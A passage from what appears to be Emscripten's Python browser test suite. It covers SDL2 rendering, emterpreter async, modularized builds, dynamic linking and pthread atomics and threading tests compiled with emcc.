self.run_browser('something.html', '.', '/report_result?1')
@requires_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2','--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
open('test.html', 'w').write(html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window',
timeout=30)
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), os.path.join(self.get_dir(), 'cursor.bmp'))
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o']).communicate()
Popen([PYTHON, EMCC, 'test.o', '-s', 'USE_SDL=2', '-o', 'test.html']).communicate()
self.run_browser('test.html', '...', '/report_result?1')
@requires_hardware
def test_cocos2d_hello(self):
from tools import system_libs
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'Cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo',
timeout=30)
def test_emterpreter_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-g2'])
def test_emterpreter_async_2(self):
self.btest('emterpreter_async_2.cpp', '40', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O3'])
def test_emterpreter_async_virtual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual.cpp', '5', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-profiling'])
def test_emterpreter_async_virtual_2(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_virtual_2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1', '-profiling'])
def test_emterpreter_async_bad(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_bad.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=1'])
def test_emterpreter_async_bad_2(self):
for opts in [0, 1, 2, 3]:
for assertions in [0, 1]:
# without assertions, we end up continuing to run more non-emterpreted code in this testcase, returning 1
# with assertions, we hit the emterpreter-async assertion on that, and report a clear error
expected = '2' if assertions else '1'
print(opts, assertions, expected)
self.btest('emterpreter_async_bad_2.cpp', expected, args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_middle"]', '-s', 'ASSERTIONS=%s' % assertions])
def test_emterpreter_async_mainloop(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_mainloop.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts)], timeout=20)
def test_emterpreter_async_with_manual(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('emterpreter_async_with_manual.cpp', '121', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-O' + str(opts), '-s', 'EMTERPRETIFY_BLACKLIST=["_acall"]'], timeout=20)
def test_emterpreter_async_sleep2(self):
self.btest('emterpreter_async_sleep2.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz'])
def test_emterpreter_async_sleep2_safeheap(self):
# check that safe-heap machinery does not cause errors in async operations
self.btest('emterpreter_async_sleep2_safeheap.cpp', '17', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Oz', '-profiling', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'EMTERPRETIFY_WHITELIST=["_main","_callback","_fix"]', '-s', 'NO_EXIT_RUNTIME=0'])
@requires_hardware
def test_sdl_audio_beep_sleep(self):
self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os', '-s', 'ASSERTIONS=1', '-s', 'DISABLE_EXCEPTION_CATCHING=0', '-profiling', '-s', 'SAFE_HEAP=1', '-lSDL'], timeout=90)
def test_mainloop_reschedule(self):
self.btest('mainloop_reschedule.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-Os'], timeout=30)
def test_mainloop_infloop(self):
self.btest('mainloop_infloop.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'], timeout=30)
def test_emterpreter_async_iostream(self):
self.btest('emterpreter_async_iostream.cpp', '1', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1'])
def test_modularize(self):
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
for args, code in [
([], 'Module();'), # defaults
# use EXPORT_NAME
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized!
HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout
HelloWorld();
'''),
# pass in a Module option (which prevents main(), which we then invoke ourselves)
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var hello = HelloWorld({ noInitialRun: true, onRuntimeInitialized: function() {
setTimeout(function() { hello._main(); }); // must be async, because onRuntimeInitialized may be called synchronously, so |hello| is not yet set!
} });
'''),
# similar, but without a mem init file, everything is sync and simple
(['-s', 'EXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], '''
var hello = HelloWorld({ noInitialRun: true});
hello._main();
'''),
# use the then() API
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
HelloWorld({ noInitialRun: true }).then(function(hello) {
hello._main();
});
'''),
# then() API, also note the returned value
(['-s', 'EXPORT_NAME="HelloWorld"'], '''
var helloOutside = HelloWorld({ noInitialRun: true }).then(function(hello) {
setTimeout(function() {
hello._main();
if (hello !== helloOutside) throw 'helloOutside has not been set!'; // as we are async, helloOutside must have been set
});
});
'''),
]:
print('test on', opts, args, code)
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# this test is synchronous, so avoid async startup due to wasm features
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'BINARYEN_ASYNC_COMPILATION=0', '-s', 'SINGLE_FILE=1'] + args + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
%s
</script>
''' % code)
self.run_browser('a.html', '...', '/report_result?0')
# test illustrating the regression on the modularize feature since commit c5af8f6
# when compiling with the --preload-file option
def test_modularize_and_preload_files(self):
# amount of memory different from the default one that will be allocated for the emscripten heap
totalMemory = 33554432
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure', '1']]:
# the main function simply checks that the amount of allocated heap memory is correct
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
EM_ASM({
// use eval here in order for the test with closure compiler enabled to succeed
var totalMemory = Module['TOTAL_MEMORY'];
assert(totalMemory === %d, 'bad memory size');
});
REPORT_RESULT(0);
return 0;
}
''' % totalMemory
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
# no wasm, since this tests customizing total memory at runtime
Popen([PYTHON, EMCC, 'test.c', '-s', 'WASM=0', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script src="a.out.js"></script>
<script>
// instantiate the Foo module with custom TOTAL_MEMORY value
var foo = Foo({ TOTAL_MEMORY: %d });
</script>
''' % totalMemory)
self.run_browser('a.html', '...', '/report_result?0')
def test_webidl(self):
# see original in test_core.py
output = Popen([PYTHON, path_from_root('tools', 'webidl_binder.py'),
path_from_root('tests', 'webidl', 'test.idl'),
'glue']).communicate()[0]
assert os.path.exists('glue.cpp')
assert os.path.exists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I' + path_from_root('tests', 'webidl'), '-DBROWSER'] + opts)
def test_dynamic_link(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js'])
print('wasm in worker (we can read binary data synchronously there)')
open('pre.js', 'w').write('''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1']).communicate()
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker'])
print('wasm (will auto-preload since no sync binary reading)')
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1'])
@requires_hardware
def test_dynamic_link_glemu(self):
open('pre.js', 'w').write('''
Module.dynamicLibraries = ['side.wasm'];
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
open('side.cpp', 'w').write(r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
Popen([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL']).communicate()
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30*1024*1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=120) # extra time on first test, to be sure to build all libraries
# Test 64-bit atomics.
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=90)
# Test 64-bit C++11 atomics.
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11', '-s', 'USE_PTHREADS=1'], timeout=30)
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt+debug+f32+['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=60)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# 64 bit version of the above test.
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'], timeout=30)
# Tests the rest of the remaining GCC atomics after the two above tests.
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'WASM=0'] + arg, timeout=30)
# Test that basic thread creation works.
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [['-s', 'USE_PTHREADS=1'], ['-s', 'USE_PTHREADS=2', '--separate-asm']]:
print(str(opt) + ' ' + str(pthreads))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
if 'USE_PTHREADS=2' in pthreads:
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + pthreads + ['-s', 'PTHREAD_POOL_SIZE=8', '--shell-file', 'html.html'], timeout=30)
# Tests the -s PROXY_TO_PTHREAD=1 option.
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
def test_pthread_create_pthread(self):
for opt in [['-s', 'USE_PTHREADS=2', '--separate-asm'], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=opt + ['-O3', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=2'], timeout=30)
# Test that main thread can wait for a pthread to finish via pthread_join().
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'], timeout=30)
# Test pthread_cancel() operation
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test pthread_kill() operation
def test_pthread_kill(self):
if get_browser() and 'chrom' in get_browser().lower():
# This test hangs the chrome render process, and keep subsequent tests from passing too
self.skipTest("pthread_kill hangs chrome renderer")
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Tests the pthread mutex api.
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test that memory allocation is thread-safe.
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'], timeout=30)
# Test that the pthread_barrier API works ok.
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread_once() function.
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test against a certain thread exit time handling bug by spawning tons of threads.
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, timeout=30)
# Test thread-specific data (TLS).
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test the pthread condition variable creation and waiting.
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8'], timeout=30)
# Test that pthreads are able to do printf.
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the main thread is able to use pthread_set/getspecific.
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2'], timeout=30)
self.prep_no_SAB()
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-g', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_HINT_NUM_CORES=2', '--shell-file', 'html.html', '-s', 'WASM=0'], timeout=30)
# Test that pthreads have access to filesystem.
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=1'], timeout=30)
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=2', '--separate-asm', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args, timeout=30)
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'], timeout=30)
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'));
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.pthreadMainPrefixURL" string to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { pthreadMainPrefixURL: "cdn/", '))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html']).communicate()
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
